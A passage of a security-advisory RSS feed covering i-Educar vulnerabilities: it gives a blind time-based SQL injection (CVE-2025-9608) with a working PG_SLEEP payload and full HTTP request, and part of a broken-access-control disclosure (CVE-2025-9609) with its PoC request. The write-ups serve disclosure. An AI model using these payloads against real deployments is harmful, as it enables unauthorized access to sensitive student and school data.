 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe the time delay in the server response, indicating the successful execution of the SQL payload.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9607.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9607.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 29 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9608</title>
        <link>https://www.cvehunters.com/p/cve-2025-9608/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9608/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9608-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduleformulamediaview-endpoint&amp;#34;&amp;gt;CVE-2025-9608: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;/module/FormulaMedia/view&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9608&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9608&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/module/FormulaMedia/view&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9608-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduleformulamediaview-endpoint&amp;#34;&amp;gt;CVE-2025-9608: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;/module/FormulaMedia/view&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9608&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9608&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/module/FormulaMedia/view&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/module/FormulaMedia/view&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;example-request&amp;#34;&amp;gt;Example Request
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/FormulaMedia/view?id=1%27&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;%27WqeR%27=%27WqeR HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: [COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: none
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9608/image.png&amp;#34;
	width=&amp;#34;1127&amp;#34;
	height=&amp;#34;1015&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9608/image_hu_2f4a07eb87effb6.png 480w, /p/cve-2025-9608/image_hu_4a2882fae48dd050.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;111&amp;#34;
		data-flex-basis=&amp;#34;266px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe the time delay in the server response, indicating the successful execution of the SQL payload.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9608.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9608.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 29 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9609</title>
        <link>https://www.cvehunters.com/p/cve-2025-9609/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9609/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9609-missing-function-level-access-control-in-educacensoconsulta-endpoint&amp;#34;&amp;gt;CVE-2025-9609: Missing Function-Level Access Control in &amp;lt;code&amp;gt;/educacenso/consulta&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9609&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9609&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;/educacenso/consulta&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This issue allows authenticated users without the required role to access functionalities or data that should be restricted, resulting in an elevation of privilege and unauthorized access.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Vulnerable Endpoint:&amp;lt;/strong&amp;gt; &amp;lt;code&amp;gt;GET /educacenso/consulta&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Authentication:&amp;lt;/strong&amp;gt; Required (but insufficient authorization checks)&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Role required:&amp;lt;/strong&amp;gt; Just app access&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9609-missing-function-level-access-control-in-educacensoconsulta-endpoint&amp;#34;&amp;gt;CVE-2025-9609: Missing Function-Level Access Control in &amp;lt;code&amp;gt;/educacenso/consulta&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9609&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9609&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;/educacenso/consulta&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This issue allows authenticated users without the required role to access functionalities or data that should be restricted, resulting in an elevation of privilege and unauthorized access.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Vulnerable Endpoint:&amp;lt;/strong&amp;gt; &amp;lt;code&amp;gt;GET /educacenso/consulta&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Authentication:&amp;lt;/strong&amp;gt; Required (but insufficient authorization checks)&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Role required:&amp;lt;/strong&amp;gt; Just app access&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Affected scenario:&amp;lt;/strong&amp;gt; A user without the required role is still able to directly access the endpoint.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to enforce proper role-based access control (RBAC) on the &amp;lt;code&amp;gt;/educacenso/consulta&amp;lt;/code&amp;gt; endpoint. As a result, users with lower privilege levels can access sensitive data and functionalities that should be restricted to higher-privileged roles.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Request using a session from a user without the Educacenso role:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /educacenso/consulta HTTP/1.1 Host: &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;target&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt; Cookie: PHPSESSID=&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;low_privileged_session&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9609/image.png&amp;#34;
	width=&amp;#34;1575&amp;#34;
	height=&amp;#34;708&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9609/image_hu_342a2b269456c359.png 480w, /p/cve-2025-9609/image_hu_78d6f5df22994203.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;222&amp;#34;
		data-flex-basis=&amp;#34;533px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Observed Result:&amp;lt;/strong&amp;gt; The server responds with HTTP 200 and returns restricted content.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Expected Result:&amp;lt;/strong&amp;gt; The server should respond with HTTP 403 (Forbidden).&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive educational census data;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Elevation of privilege from a basic user to roles with access to restricted modules;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Potential manipulation of sensitive data if write operations are accessible;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Breach of confidentiality and integrity of protected information;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Compliance violations if sensitive personal data is exposed to unauthorized users.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9608.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9608.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
